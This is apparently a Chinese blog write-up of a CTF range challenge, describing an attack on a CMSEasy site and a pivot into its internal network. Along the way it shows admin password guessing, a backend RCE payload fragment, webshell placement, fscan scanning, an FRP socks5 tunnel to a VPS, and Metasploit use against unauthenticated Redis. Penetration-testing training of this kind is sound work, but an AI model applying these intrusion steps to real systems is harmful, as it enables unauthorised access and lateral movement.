• 【安鸾靶场】cmseasy&内网渗透 (500分)



    题目

    在这里插入图片描述

    一、渗透开始

    在这里插入图片描述
    burp后没有报漏洞:

    在这里插入图片描述

    /admin存在后台:
    在这里插入图片描述
    爆破一下:
    admin
    admin123
    在这里插入图片描述

    在这里插入图片描述

    后台执行rce漏洞

    POC
    1111111111";}

    在这里插入图片描述
    触发漏洞:
    在这里插入图片描述

    在这里插入图片描述
    可以看到禁用了很多函数:但是没有禁用关键函数
    在这里插入图片描述
    pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

    先写一个代码执行的php:这里可能触发了内部的waf
    在这里插入图片描述
    写入shell:
    在这里插入图片描述

    注意这里不能直接连接,我们需要找到路径才行
    在这里插入图片描述
    扫一下目录:
    在这里插入图片描述
    找了半天在:http://106.15.50.112:8021/config/tag/category_27.php

    在这里插入图片描述
    拿到shell:
    在这里插入图片描述

    在这里插入图片描述
    第一部分:flag{fc64319e5227aa1d

    拿第二部分:
    在这里插入图片描述
    上传个fscan:

    在这里插入图片描述

    在这里插入图片描述
    直接扫网段:
    在这里插入图片描述

    在这里插入图片描述
    感觉不对劲有点多看网段是20段:重新运行一下:
    应该是192.168.112.3这台
    在这里插入图片描述
    这个112.1应该是内网的靶场就不去动他了:直接看
    这个应该是redis的未授权访问
    在这里插入图片描述

    内网横向

    搭建frp内网穿透,简单来说将我们已经拿到权限这台Linux流量发送到公网的vps上,我们使用代理工具连接就能访问Linux的内网了。

    frp工具地址:https://github.com/fatedier/frp
    在这里插入图片描述
    配置frps.ini

    [common]
    bind_addr = 0.0.0.0
    bind_port = 7000
    ./frps -c frps.ini
    
    • 1
    • 2
    • 3
    • 4

    在这里插入图片描述

    [common]
    server_addr = xx.xx.xx.xx #/PS
    server_port = 7000 #与/PS服务器开放端口一致
    [http_proxy]
    type = tcp #类型
    remote_port = 7777 #通过socks5连接到/PS服务器端口进行数据传输
    plugin = socks5
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    这里已经可以访问内网了:
    在这里插入图片描述
    kali怎么连接:kali直接用代理
    在这里插入图片描述

    在这里插入图片描述
    在kali中需要proxychains4加上命令才能使用代理:
    使用msf的redis未授权:
    proxychains4 msfconsole
    这里使用命令执行模块:info命令执行成功
    在这里插入图片描述
    这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式
    kali生成私钥
    在这里插入图片描述

    在这里插入图片描述
    这里失败了

    msf查看也是写入了但是连不起:
    在这里插入图片描述
    等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。

  • 相关阅读:
    chineseocr测试具体部署步骤(不用web界面)
    MCS:离散随机变量——Binomial分布
    10. python字典
    rk3588 香橙派 vncserver连接 图形界面远程登陆
    55跳跃游戏
    QT 连接SQLServer数据库
    苹果如何做ASO优化?优化的主要思路有哪些?
    使用vue3 搭建一个H5手机端访问的项目
    pytorch学习第三篇:梯度
    【JVM】JVM的内存区域划分
  • 原文地址:https://blog.csdn.net/qq_39583774/article/details/133753512